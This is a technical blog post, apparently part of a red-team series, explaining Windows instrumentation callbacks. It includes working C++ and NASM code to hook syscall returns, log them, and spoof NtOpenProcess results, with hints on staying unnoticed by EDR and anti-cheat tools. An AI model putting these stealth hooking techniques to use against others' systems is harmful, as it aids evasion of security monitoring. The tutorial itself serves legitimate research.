NtSetInformationProcess is a common syscall that does multiple things; it receives the same parameters as its kernelbase counterpart SetProcessInformation. Its second parameter, ProcessInformationClass, is an enum that specifies the operation to execute.

With the knowledge from Alex Ionescu’s Hooking Nirvana presentation, finding the relevant code in NtSetInformationProcess is easy. Within the function, a switch case on the second parameter, the ProcessInformationClass enum, is performed. Case 0x28 is what is relevant for us to set an IC.

For brevity, we will not be going through the entirety of the function. If you are interested in looking at it yourself, you can find it in ntoskrnl.exe at NtSetInformationProcess+0x1b42.

Right after validating the passed handle, a call to PsGetCurrentProcess and SeSinglePrivilegeCheck with SeDebugPrivilege passed as parameter is made.

Then, a big if statement (NtSetInformationProcess+0x1c2b) is opened, which checks if the return value of SeSinglePrivilegeCheck is true or if an unknown variable is equal to PsGetCurrentProcess. This lets us guess we require the SeDebugPrivilege to set an IC on other processes, but we don’t need it to set it on our own process.

At NtSetInformationProcess+0x1d09, we see a familiar looking offset: 0x3d8. This is the line where our IC gets set.

This logic can be represented by the following shortened pseudo code:

struct PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
  ULONG Version;
  ULONG Reserved;
  PVOID Callback;
};
NTSTATUS NtSetInformationProcess(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, [...]) {
  switch (ProcessInformationClass) {
    // [...]
    case 0x28: {
      KPROCESS* requested_process;
      NTSTATUS status = ObReferenceObjectByHandle(ProcessHandle, PROCESS_SET_INFORMATION, PsProcessType, [...], &requested_process, [...]);
      if (status < 0)
        return status;
      KPROCESS* current_process = PsGetCurrentProcess();
      // PreviousMode of the calling thread (KTHREAD+0x232)
      bool has_debug_priv = SeSinglePrivilegeCheck(SeDebugPrivilege, CurrentThread->PreviousMode);
      if (!has_debug_priv && requested_process != current_process)
        return STATUS_PRIVILEGE_NOT_HELD;
      if (IsWow64Process(requested_process))
        return STATUS_NOT_SUPPORTED;
      void* ic_address = ((PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION*)ProcessInformation)->Callback;
      // IC sanity checks
      // [...]
      // Offset 0x3d8 of the KPROCESS structure
      requested_process->InstrumentationCallback = ic_address;
      // [...]
    }
  }
}
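The access decisions in the pseudocode above can be isolated into a small, portable function. The following sketch is our own model, not kernel code: the name ic_access_check is hypothetical, the elided sanity checks are not modelled, and the status values are the standard NTSTATUS codes for STATUS_PRIVILEGE_NOT_HELD (0xC0000061) and STATUS_NOT_SUPPORTED (0xC00000BB).

```cpp
#include <cstdint>

using ntstatus_t = std::int32_t;

constexpr ntstatus_t status_success = 0;
constexpr ntstatus_t status_privilege_not_held = static_cast<ntstatus_t>(0xC0000061);
constexpr ntstatus_t status_not_supported = static_cast<ntstatus_t>(0xC00000BB);

// Models only the access decisions of case 0x28; the elided IC sanity checks are not modelled
constexpr ntstatus_t ic_access_check(bool has_debug_privilege, bool target_is_current_process, bool target_is_wow64) {
    if (!has_debug_privilege && !target_is_current_process)
        return status_privilege_not_held;  // other processes require SeDebugPrivilege
    if (target_is_wow64)
        return status_not_supported;       // WoW64 targets are rejected
    return status_success;
}
```

This matches the guess made above: our own process never needs SeDebugPrivilege, every other process does.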

Setting up a basic IC

Now that we have partially reversed KiSetupForInstrumentationReturn and NtSetInformationProcess we know the following things:

  • An IC can be set from user mode with NtSetInformationProcess.
    • ProcessInformationClass needs to be set to 0x28.
    • If we want to set an IC on another process, we need to have the SeDebugPrivilege.
  • When the IC is executed, r10 will hold the original rip.

For a successful NtSetInformationProcess call, the following struct needs to be passed as ProcessInformation parameter. We will also need the type definition of NtSetInformationProcess.

struct PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
ULONG Version;
ULONG Reserved;
PVOID Callback;
};
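Since ULONG is 32 bits wide on Windows, the structure is 16 bytes on x64, with Callback at offset 8. The following portable sketch mirrors it with fixed-width types (the lowercase name is our own, chosen so it does not clash with the Windows definition) and checks that layout at compile time.

```cpp
#include <cstddef>
#include <cstdint>

// Portable mirror of PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION:
// ULONG is 32 bits wide on Windows, PVOID is a plain pointer
struct process_instrumentation_callback_information {
    std::uint32_t version;   // must be 0
    std::uint32_t reserved;  // must be 0
    void* callback;          // address of the assembly bridge
};

static_assert(sizeof(void*) == 8, "this layout check assumes a 64-bit target");
// The two 32-bit fields fill the first 8 bytes, so the pointer needs no padding
static_assert(offsetof(process_instrumentation_callback_information, callback) == 8, "Callback at offset 8");
static_assert(sizeof(process_instrumentation_callback_information) == 16, "16 bytes in total");
```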

Only the Callback member matters to us; the other two need to be set to 0. You can try setting Callback to a function pointer; however, you will not be very successful, as the stack was not set up for a function call. The Callback member should instead point to some assembly code. This assembly code, which we will call the bridge, needs to do the following:

  1. Save the registers
  2. Set up a function call
  3. Restore stack and registers after function call
  4. Jump to r10 as that holds the actual address the code should resume at.

Depending on what you want to use your IC for, you will most likely trigger syscalls from within the IC itself. This would cause an infinite recursion, as the IC would be called again when the syscall is triggered; thus, we will also need an option to disable the IC for the current thread.

Let’s try setting up a very simple IC that will trigger a breakpoint on a kernel-to-user-mode return.

Setting the IC

The following is our exemplary code to set an IC. You will of course need to have a function definition for NtSetInformationProcess.

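#include <print>
#include <Windows.h>
#include <winternl.h> // NTSTATUS

// Not part of the Windows SDK headers, so we declare it ourselves
struct PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
  ULONG Version;  // must be 0
  ULONG Reserved; // must be 0
  PVOID Callback; // address of the assembly bridge
};
using NtSetInformationProcess_t = NTSTATUS(NTAPI*)(HANDLE, PROCESS_INFORMATION_CLASS, PVOID, ULONG);

// Assembly bridge, written in NASM below
extern "C" void instrumentation_adapter();

// Called by the bridge; for now, it only breaks into the attached debugger
extern "C" void instrumentation_callback() {
  __debugbreak();
}

int main() {
  PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION instrumentation_info{};
  instrumentation_info.Callback = reinterpret_cast<void*>(&instrumentation_adapter);
  const auto nt_set_info_proc = reinterpret_cast<NtSetInformationProcess_t>(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationProcess"));
  if (!nt_set_info_proc) {
    std::println("Could not resolve NtSetInformationProcess");
    return 1;
  }
  // 0x28 is the ProcessInformationClass that installs an IC
  const auto status = nt_set_info_proc(GetCurrentProcess(), static_cast<PROCESS_INFORMATION_CLASS>(0x28), &instrumentation_info, sizeof(instrumentation_info));
  if (status) {
    std::println("NtSetInformationProcess returned {:x}", static_cast<ULONG>(status));
  } else {
    std::println("Successfully installed instrumentation callback");
  }
  return 0;
}

extern "C" is used to disable C++ name mangling and use C-style linkage instead, so the assembly code and the C++ code can refer to each other by their plain names.

With the line extern "C" void instrumentation_adapter(); we declare our not-yet-written assembly bridge.

instrumentation_callback is the function we want to call through our assembly bridge. For now, we just trigger a breakpoint there, as we have not yet implemented a flag to avoid recursion.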

Writing the assembly bridge

For writing the assembly bridge, we’ll be using NASM. If you are using MASM or another assembler, you will of course need to adjust the assembly accordingly.

We will start by pushing the registers, setting up the function call, calling it and then undoing our changes. After that, we will jump to r10 to continue the execution flow. There are multiple ways you can save the current registers, either you just push them to the stack, save them to a structure or call Windows functions doing that for you. Please note that the following snippets do not save, for example, the floating-point registers.

extern instrumentation_callback
section .code
global instrumentation_adapter
instrumentation_adapter:
pushfq
push rax
push rbx
push rcx
push rdx
push rdi
push rsi
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
push rbp
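mov rbp, rsp
and rsp, -16 ; align the stack to 16 bytes, as the x64 calling convention requires before a call
sub rsp, 0x20 ; shadow space for the callee
call instrumentation_callback
mov rsp, rbp ; undo the alignment and the shadow space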
pop rbp
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rsi
pop rdi
pop rdx
pop rcx
pop rbx
pop rax
popfq
jmp r10

By running the program with an attached debugger, you should now trigger the breakpoint in the C++ code. This means, our function is correctly called. However, we obviously want to do more with our callback than trigger a breakpoint, but for that we will need to implement a check to avoid infinite recursion as the IC would be executed for every syscall, even if the syscall was made by the IC itself.

This flag should be thread-local, as otherwise we would not catch syscall executions in other threads while our IC in one thread is executing.

For this purpose, we’ll be misusing the legacy member InstrumentationCallbackDisabled of the Thread Environment Block (TEB). This is, at least in x64 versions, no longer used. There are smarter ways of implementing such a check, for example with Thread Local Storage, as using the InstrumentationCallbackDisabled member is an obvious giveaway to EDRs/ACs that something weird is going on.

If you look at the structure of the TEB, you will see InstrumentationCallbackDisabled is located at offset 0x1b8. The idea is that once the IC is triggered, InstrumentationCallbackDisabled gets set to 1 (true) and then our C++ function is executed. If that function triggers syscalls, they will not call the function again, because our assembly bridge first checks whether InstrumentationCallbackDisabled is set to 1 (true); if it is, it directly continues execution. Once our C++ function has returned and the assembly bridge restores the registers, the flag is cleared again.

To do this, the following assembly can be used. The first part before the dots is meant to be added right after the pushfq, and the bottom part is meant to replace everything after pop rax.

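  mov rcx, [gs:30h] ; TEB
  add rcx, 1b8h ; TEB->InstrumentationCallbackDisabled
  cmp byte [rcx], 1
  je _ret ; IC already running on this thread: skip the callback
  mov byte [rcx], 1 ; disable the IC for this thread while our callback runs
  […]
  mov rcx, [gs:30h] ; TEB
  add rcx, 1b8h ; TEB->InstrumentationCallbackDisabled
  mov byte [rcx], 0 ; re-enable the IC
_ret:
  popfq
  jmp r10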

The careful eye might’ve noticed something: with this code we are no longer backing up and restoring rcx. Why’s that?

If you attach a debugger to a program, place a breakpoint on the instruction after a syscall and trigger it, you will see that rcx holds the address of the instruction after the syscall. If you do the same with an IC set, you will see that rcx holds the address of the IC. If you wanted to hide the existence of your IC, this would obviously be counterproductive. Fixing this is not part of this article and will not be covered here.

We would also recommend checking the value of r10 with and without an IC set.
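The article mentions Thread Local Storage as a less conspicuous alternative to the TEB member. The following portable sketch models the bridge’s check-and-set logic with a C++ thread_local flag instead; it is only a simulation, in which simulated_syscall stands in for a syscall whose return passes through the IC, and all names are hypothetical.

```cpp
#include <cassert>

// Hypothetical thread-local stand-in for TEB->InstrumentationCallbackDisabled
thread_local bool ic_disabled = false;

// Counts how often the body of the callback actually ran
int callback_runs = 0;

void simulated_syscall();

// Models bridge + callback: skip if disabled, otherwise disable, run, re-enable
void on_kernel_to_user_return() {
    if (ic_disabled)
        return;               // return from a syscall made inside our own callback
    ic_disabled = true;       // only affects the current thread
    ++callback_runs;
    simulated_syscall();      // the callback itself performs a syscall
    assert(ic_disabled);      // the nested return must not have cleared the flag
    ic_disabled = false;      // re-enable before resuming at the original return point
}

// In this model, every syscall returns through the IC
void simulated_syscall() {
    on_kernel_to_user_return();
}
```

Each outer call runs the callback body exactly once, although the callback itself makes a "syscall"; without the flag, the two functions would recurse until the stack overflows.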

Logging and spoofing syscalls

Let’s recap: by now we can execute our own C/C++ function after every kernel-to-user-mode return and make syscalls from within it. This is cool; however, we can’t react to specific syscalls yet, as our C++ function has no access to the return address of the executed syscall. Let’s fix this, and while we are at it, let’s pass even more parameters that will be useful to us. In total, we are planning to add three parameters: the return address of the syscall that was executed, its return value and the original stack pointer. Why the original stack pointer is interesting will be explained shortly.

As mentioned before, there are different ways of saving the registers and different ways of passing information to your function. If you saved the registers in, for example, a CONTEXT structure, you could just pass that to your IC.

Let’s first change our function definition to add the three parameters. Additionally, it would be nice to change the return value of syscalls.

As specified in the Windows x64 calling convention, return values are passed in the rax register. When a syscall is made and the IC is triggered, rax holds the return value of the syscall. By changing the return type of the instrumentation_callback function from void to uint64_t, we can easily overwrite the return value of the syscall by returning another value from our C++ code, as rax is overwritten by that, provided the bridge does not restore the saved rax afterwards.

After implementing those changes, the instrumentation_callback function looks as follows:

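extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
__debugbreak();
// Returning the original value leaves the syscall's result unchanged
return return_val;
}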

Now we need to adjust the assembly bridge. We can use rcx to store the original stack pointer, as we do not need to back up rcx because of the reasons mentioned before.

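extern instrumentation_callback
section .code
global instrumentation_adapter
instrumentation_adapter:
  mov rcx, rsp ; rcx = original stack pointer (first parameter)
  pushfq
  push rcx
  mov rcx, [gs:30h] ; TEB
  add rcx, 1b8h ; TEB->InstrumentationCallbackDisabled
  cmp byte [rcx], 1
  je _skip
  mov byte [rcx], 1 ; disable the IC for this thread (mov does not change the flags)
_skip:
  pop rcx ; restore the original stack pointer (pop does not change the flags)
  je _ret
  […]
  push rbp
  mov rbp, rsp
  and rsp, -16 ; 16-byte stack alignment for the call
  sub rsp, 0x20 ; shadow space
  ; rcx already contains the original stack pointer
  mov rdx, r10 ; second parameter: return address
  mov r8, rax ; third parameter: return value of the syscall
  call instrumentation_callback
  mov rsp, rbp
  pop rbp
  ; rax now holds the callback's return value
  […]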

Running this should again trigger the breakpoint in our C++ code, and the debugger should show that the parameters contain the expected values.

Logging syscalls

To log syscalls with their function name, we will use the dbghelp library, which you need to link against.

Additionally, the following code needs to be added to the start of main to allocate a console and initialize the symbol handler.

[…]
if (!AllocConsole())
    return -1;

// Redirect the C standard streams to the new console
FILE* fp;
freopen_s(&fp, "CONOUT$", "w", stdout);
freopen_s(&fp, "CONIN$", "r", stdin);
freopen_s(&fp, "CONOUT$", "w", stderr); // there is no CONERR$ device; stderr also goes to CONOUT$
SymSetOptions(SYMOPT_UNDNAME);
if (!SymInitialize(reinterpret_cast<HANDLE>(-1), nullptr, TRUE)) {
    std::println("SymInitialize failed");
    return -1;
}
[…]

The following instrumentation_callback function then prints out all the called function names, their address, the displacement from the function start and the return value.

extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
    // SYMBOL_INFO ends in a variable-length Name field, so reserve room for the name
    alignas(SYMBOL_INFO) std::array<uint8_t, sizeof(SYMBOL_INFO) + MAX_SYM_NAME> buffer{};
    const auto symbol_info = reinterpret_cast<SYMBOL_INFO*>(buffer.data());
    symbol_info->SizeOfStruct = sizeof(SYMBOL_INFO);
    symbol_info->MaxNameLen = MAX_SYM_NAME;
    uint64_t displacement = 0;
    // Resolve the address the syscall returns to (inside the ntdll stub)
    if (!SymFromAddr(GetCurrentProcess(), return_addr, &displacement, symbol_info)) {
        printf("[-] SymFromAddr failed: %lu\n", GetLastError());
        return return_val;
    }
    // Name is an array and never null, so check for an empty string instead
    if (symbol_info->Name[0] != '\0')
        printf("[+] %s+0x%llx \n\t- Returns: 0x%llx\n\t- Return address: 0x%llx\n",
               symbol_info->Name, displacement, return_val, return_addr);
    return return_val; // do not modify the syscall result
}
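The “displacement” printed above is the distance between the return address and the start of the closest preceding symbol. The following portable C++ sketch models that lookup with a hypothetical in-memory symbol table (symbol, resolved_symbol and resolve are illustrative names, and the addresses are made up). Real dbghelp additionally uses module boundaries, symbol sizes and PDB data, which this sketch ignores.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <optional>
#include <string>
#include <vector>

// Hypothetical symbol table entry: start address and function name.
struct symbol {
    uint64_t address;
    std::string name;
};

struct resolved_symbol {
    std::string name;
    uint64_t displacement; // addr - symbol start, comparable to SymFromAddr's Displacement
};

// Simplified address-to-symbol lookup: choose the symbol with the highest
// start address that is <= addr and report the offset into it.
inline std::optional<resolved_symbol> resolve(std::vector<symbol> table, uint64_t addr) {
    std::sort(table.begin(), table.end(),
              [](const symbol& a, const symbol& b) { return a.address < b.address; });
    // First symbol that starts strictly after addr
    auto it = std::upper_bound(table.begin(), table.end(), addr,
                               [](uint64_t value, const symbol& s) { return value < s.address; });
    if (it == table.begin())
        return std::nullopt; // addr lies before every known symbol
    --it;                    // closest symbol starting at or before addr
    return resolved_symbol{it->name, addr - it->address};
}
```

For example, with NtOpenProcess at 0x1000 in the table, a return address of 0x1014 resolves to NtOpenProcess with a displacement of 0x14.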

This functionality is most useful when the project is built as a DLL instead of an EXE, since the DLL can then be injected into a process to observe which syscalls that program triggers.

Spoofing syscalls

Let’s now start doing cool stuff with our IC: since the IC is the first code executed in user mode after a syscall returns, we can use it to spoof the syscall’s return value.

For this example, our test program will use OpenProcess to open a handle to another process. Our IC will then retrieve the opened handle from the stack, close it and return STATUS_ACCESS_DENIED instead.

Our IC is only triggered by NtOpenProcess, which is called by OpenProcess, not by OpenProcess itself. Let’s look at the definitions of both functions:

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);
NTSTATUS NtOpenProcess(
  [out]          PHANDLE            ProcessHandle,
  [in]           ACCESS_MASK        DesiredAccess,
  [in]           POBJECT_ATTRIBUTES ObjectAttributes,
  [in, optional] PCLIENT_ID         ClientId
);

As we can see, rax, the register containing the return value of the syscall, will hold an NTSTATUS value and not the handle. The handle itself is written through the ProcessHandle output parameter into a variable on the caller’s stack. So first, we need to check whether NtOpenProcess completed without an error, and then we need to retrieve the handle from the stack, for which we need its stack offset.
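An NTSTATUS is a 32-bit signed value whose top two bits encode the severity; the NT_SUCCESS macro from the Windows headers treats every non-negative value as success. The portable sketch below mirrors that logic with hypothetical helper names (nt_success, nt_severity, status_from_rax). It also assumes that only the low 32 bits of rax carry the status, which matches the test eax, eax used by OpenProcess in the disassembly of this section.

```cpp
#include <cassert>
#include <cstdint>

using ntstatus = int32_t; // NTSTATUS is a 32-bit signed integer

// Mirrors NT_SUCCESS: success (severity 0) and informational (severity 1)
// codes are non-negative; warnings (2) and errors (3) are negative.
constexpr bool nt_success(ntstatus status) { return status >= 0; }

// Severity lives in bits 31..30.
constexpr unsigned nt_severity(ntstatus status) {
    return static_cast<uint32_t>(status) >> 30;
}

// The IC receives rax as 64 bits; keep only the low 32 bits as the status.
constexpr ntstatus status_from_rax(uint64_t rax) {
    return static_cast<ntstatus>(static_cast<uint32_t>(rax));
}
```

With these helpers, 0 is a success and 0xC0000022 (STATUS_ACCESS_DENIED) decodes to severity 3, an error.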

As OpenProcess returns a HANDLE, we know the required logic to retrieve the handle is already implemented in OpenProcess after the NtOpenProcess function call.

Let’s reverse OpenProcess in kernelbase to retrieve the offset:

[…]
call qword [rel NtOpenProcess]
nop dword [rax+rax]
test eax, eax
js 0x1800338c5
mov rax, qword [rsp+0x88]
add rsp, 0x68
retn
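Read as C++, the tail of this listing roughly corresponds to the portable model below. The names fake_handle, nt_open_process_fn and open_process_model are hypothetical stand-ins, and the error branch (the js target) is not part of the listing, so it is modelled after the documented behaviour of OpenProcess: it returns NULL on failure (the real function also sets the thread’s last-error value, which the model omits).

```cpp
#include <cassert>
#include <cstdint>

using ntstatus = int32_t;
using fake_handle = void*; // stand-in for HANDLE

// Stand-in for NtOpenProcess: writes a handle through the out-parameter
// and returns a status.
using nt_open_process_fn = ntstatus (*)(fake_handle* process_handle);

inline fake_handle open_process_model(nt_open_process_fn nt_open) {
    fake_handle handle = nullptr;        // the local variable at [rsp+0x88]
    ntstatus status = nt_open(&handle);  // call NtOpenProcess
    if (status < 0)                      // test eax, eax / js <error path>
        return nullptr;                  // assumed: documented NULL on failure
    return handle;                       // mov rax, qword [rsp+0x88]
}
```

The model makes one consequence explicit: whatever value ends up in the stack variable, a failing status makes the caller of OpenProcess receive NULL.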

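Most of the function is not important for us; we just need to check how the handle gets loaded into rax. This is done through the operation mov rax, qword [rsp+0x88], so relative to the stack pointer of OpenProcess, the handle is stored at an offset of 0x88. Our original_rsp parameter, however, holds the stack pointer inside NtOpenProcess, not that of OpenProcess. The call instruction pushed the address NtOpenProcess should return to in OpenProcess onto the stack, and the NtOpenProcess stub does not allocate a stack frame of its own, so the top of the stack holds that return address and original_rsp is 8 bytes lower than the stack pointer of OpenProcess. Therefore, we need to add 8 to 0x88, which gives an offset of 0x90 to access the handle. Keep in mind that this offset is specific to the analysed kernelbase.dll build.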
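The offset arithmetic can be written down as a small constexpr sketch. The constant 0x88 comes from the disassembly above and is build-specific; the names handle_offset_in_openprocess, return_address_size and handle_address are illustrative.

```cpp
#include <cassert>
#include <cstdint>

// From `mov rax, qword [rsp+0x88]` in the analysed kernelbase.dll build.
constexpr uint64_t handle_offset_in_openprocess = 0x88;

// `call` pushes an 8-byte return address, and the NtOpenProcess stub sets up
// no frame, so rsp inside the stub is 8 bytes below OpenProcess's rsp.
constexpr uint64_t return_address_size = 8;

// Address of OpenProcess's handle variable, given the rsp seen by the IC.
constexpr uint64_t handle_address(uint64_t original_rsp) {
    const uint64_t openprocess_rsp = original_rsp + return_address_size;
    return openprocess_rsp + handle_offset_in_openprocess;
}

static_assert(handle_address(0) == 0x90, "0x88 + 8 == 0x90");
```

Expressing the offset as two named parts makes it easy to update when a different kernelbase.dll build uses another frame layout.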

This also explains why we added an original_rsp parameter to our C++ function. We could still access the handle from within the function with inline assembly; however, every time we changed the function, for example by adding a local variable, we would need to recalculate the offset to the handle, as a bigger stack frame would be allocated for our function.

Let’s recap what we require to spoof the handle access:

  1. We need to calculate the address the syscall in NtOpenProcess returns to, i.e. the address of its ret instruction.
  2. We need to check whether the return address passed to the IC matches that address.
  3. We should check the value of rax. If it contains a non-zero value, NtOpenProcess failed and there is no handle to replace.
  4. We need to close the handle stored at offset 0x90 from the original stack pointer and replace it with INVALID_HANDLE_VALUE.
  5. We need to change the return value to STATUS_ACCESS_DENIED (0xC0000022).

Since all of this now happens in C++, the implementation is straightforward:

extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
    // Resolve the address the syscall in NtOpenProcess returns to once and cache it
    static uint64_t nt_open_proc;
    if (!nt_open_proc) {
        nt_open_proc = reinterpret_cast<uint64_t>(
            GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcess"));
        if (!nt_open_proc)
            return return_val;
        nt_open_proc += 20; // offset of the ret instruction following syscall in the x64 stub
    }
    // Only handle syscalls that return into NtOpenProcess
    if (return_addr != nt_open_proc)
        return return_val;
    // NtOpenProcess failed, so there is no handle to take away
    if (return_val != 0)
        return return_val;
    // OpenProcess keeps the handle at original_rsp + 0x90 (0x88 + 8 for the return address)
    auto handle_ptr = reinterpret_cast<HANDLE*>(original_rsp + 0x90);
    if (*handle_ptr == INVALID_HANDLE_VALUE)
        return return_val;
    std::println("[+] IC: Detected program NtOpenProcess call: {}", *handle_ptr);
    CloseHandle(*handle_ptr);
    std::println("[+] IC: Closed opened handle and spoofing Access denied");
    *handle_ptr = INVALID_HANDLE_VALUE;
    return 0xC0000022; // STATUS_ACCESS_DENIED
}
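The callback above hard-codes nt_open_proc += 20. A slightly more defensive alternative is to locate the byte after the syscall instruction in the stub itself. The sketch below assumes the common x64 ntdll stub layout shown in its comment (verify it against your own ntdll.dll); syscall_return_offset is a hypothetical helper, and the example bytes use an illustrative syscall number. On Windows, one would copy the first bytes of NtOpenProcess into such an array before calling it.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>

// Assumed x64 ntdll syscall stub layout:
//   4C 8B D1                  mov r10, rcx
//   B8 xx xx xx xx            mov eax, <syscall number>
//   F6 04 25 08 03 FE 7F 01   test byte [0x7FFE0308], 1
//   75 03                     jne +3
//   0F 05                     syscall
//   C3                        ret      <- offset 20, the address the IC sees
template <std::size_t N>
std::optional<std::size_t> syscall_return_offset(const std::array<uint8_t, N>& stub) {
    // Require the `mov r10, rcx; mov eax, imm32` prologue; a hooked or
    // unexpected stub is rejected instead of being scanned blindly.
    if (N < 8 || stub[0] != 0x4C || stub[1] != 0x8B || stub[2] != 0xD1 || stub[3] != 0xB8)
        return std::nullopt;
    // Start after the prologue so the syscall number is never mistaken
    // for the `syscall` opcode (0F 05).
    for (std::size_t i = 8; i + 1 < N; ++i) {
        if (stub[i] == 0x0F && stub[i + 1] == 0x05)
            return i + 2; // first byte after `syscall`
    }
    return std::nullopt;
}
```

Rejecting stubs that do not start with the expected prologue means a modified stub (for example one hooked by a security product) leads to no spoofing rather than a comparison against a wrong address.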

To test this, let’s open a handle to a process with and without an IC set. For this example, we’ll be using notepad.exe as a test program. As OpenProcess requires a process ID, we have also added a basic process ID enumeration function.

#include <tlhelp32.h>
[…]
uint32_t get_process_id(const std::string_view& process_name) {
    PROCESSENTRY32 proc_entry{ .dwSize = sizeof(PROCESSENTRY32) };
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;
    if (!Process32First(snapshot, &proc_entry)) {
        CloseHandle(snapshot); // do not leak the snapshot handle
        return 0;
    }
    do {
        if (std::string{ proc_entry.szExeFile } != process_name)
            continue;
        CloseHandle(snapshot);
        return proc_entry.th32ProcessID;
    } while (Process32Next(snapshot, &proc_entry));
    CloseHandle(snapshot);
    return 0;
}

int main()
{
    PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION instrumentation_info{};
    instrumentation_info.Callback = reinterpret_cast<void*>(&instrumentation_adapter);
    const auto nt_set_info_proc = reinterpret_cast<NtSetInformationProcess_t>(
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationProcess"));
    if (!nt_set_info_proc) {
        std::println("Could not resolve NtSetInformationProcess");
        return -1;
    }
    const auto pid = get_process_id("notepad.exe");
    if (pid == 0) {
        std::println("Could not find notepad.exe");
        return -1;
    }
    // First attempt without an IC. OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE.
    auto handle = OpenProcess(GENERIC_ALL, FALSE, pid);
    if (handle) {
        std::println("Successfully opened process handle: {}", handle);
        CloseHandle(handle);
    } else {
        std::println("Failed opening process handle, error {}", GetLastError());
    }
    // 0x28 = ProcessInstrumentationCallback
    auto status = nt_set_info_proc(GetCurrentProcess(), static_cast<_PROCESS_INFORMATION_CLASS>(0x28), &instrumentation_info, sizeof(instrumentation_info));
    if (status) {
        std::println("NtSetInformationProcess returned {:x}", static_cast<uint32_t>(status));
        return -1;
    }
    std::println("Successfully installed instrumentation callback");
    // Second attempt: the IC closes the handle and spoofs STATUS_ACCESS_DENIED
    handle = OpenProcess(GENERIC_ALL, FALSE, pid);
    if (handle) {
        std::println("Successfully opened process handle: {}", handle);
        CloseHandle(handle);
    } else {
        std::println("Failed opening process handle, error {}", GetLastError());
    }
}
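One caveat of get_process_id: Windows treats file and process names case-insensitively, while its name check compares exactly, so an image reported with different casing (for example "Notepad.exe") would not match "notepad.exe". A minimal ASCII-only helper such as the hypothetical iequals_ascii below could be used for that check instead; it does not replicate the full Unicode case folding Windows performs.

```cpp
#include <cassert>
#include <cctype>
#include <cstddef>
#include <string_view>

// Case-insensitive comparison for ASCII names such as "notepad.exe".
inline bool iequals_ascii(std::string_view a, std::string_view b) {
    if (a.size() != b.size())
        return false;
    for (std::size_t i = 0; i < a.size(); ++i) {
        // Cast to unsigned char first: std::tolower has undefined behaviour for negative chars
        const auto ca = static_cast<unsigned char>(a[i]);
        const auto cb = static_cast<unsigned char>(b[i]);
        if (std::tolower(ca) != std::tolower(cb))
            return false;
    }
    return true;
}
```

In an ANSI build, the comparison inside the loop of get_process_id could then call this helper with proc_entry.szExeFile and process_name.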

Executing the code with a working IC should result in one successful and one failed OpenProcess call if notepad.exe is running.

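Of course, OpenProcess was just used as an example. The same approach works for any syscall, as long as we know the address its syscall returns to and, for output parameters, where the caller keeps them on the stack.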
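To handle several syscalls, the single if-chain of the NtOpenProcess example could be turned into a lookup keyed by return address. The following is a hypothetical design sketch (syscall_spoofer and spoof_handler are not from the original code). As a precaution, the table should be populated before the IC is installed, so the callback itself only performs a lookup and avoids allocations.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>
#include <unordered_map>
#include <utility>

// Handler that may rewrite a syscall's return value; it also receives the
// original stack pointer so it can reach output parameters on the stack.
using spoof_handler = std::function<uint64_t(uint64_t original_rsp, uint64_t return_val)>;

class syscall_spoofer {
public:
    // return_addr: address the syscall returns to (stub address + ret offset).
    void add(uint64_t return_addr, spoof_handler handler) {
        handlers_[return_addr] = std::move(handler);
    }

    // Meant to be called from instrumentation_callback with its three arguments.
    uint64_t dispatch(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) const {
        const auto it = handlers_.find(return_addr);
        if (it == handlers_.end())
            return return_val; // not a syscall we care about: pass through
        return it->second(original_rsp, return_val);
    }

private:
    std::unordered_map<uint64_t, spoof_handler> handlers_;
};
```

Unregistered syscalls pass through unchanged, so adding another spoofed syscall only requires registering its return address and a handler.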

Closing words

In this blog post, you learned how ICs work and how they can be used to log and spoof syscalls from user mode. ICs can be used for much more: in the upcoming posts, you will learn how to inject shellcode into other processes and how to hook function calls with ICs, for example to prevent others from overwriting your own IC. In a more theoretical part of the series, we will discuss other use cases of ICs and possible countermeasures.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Reverse Engineering

Windows Instrumentation Callbacks – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Command-and-Control

Beacon Object Files for Mythic – Part 2

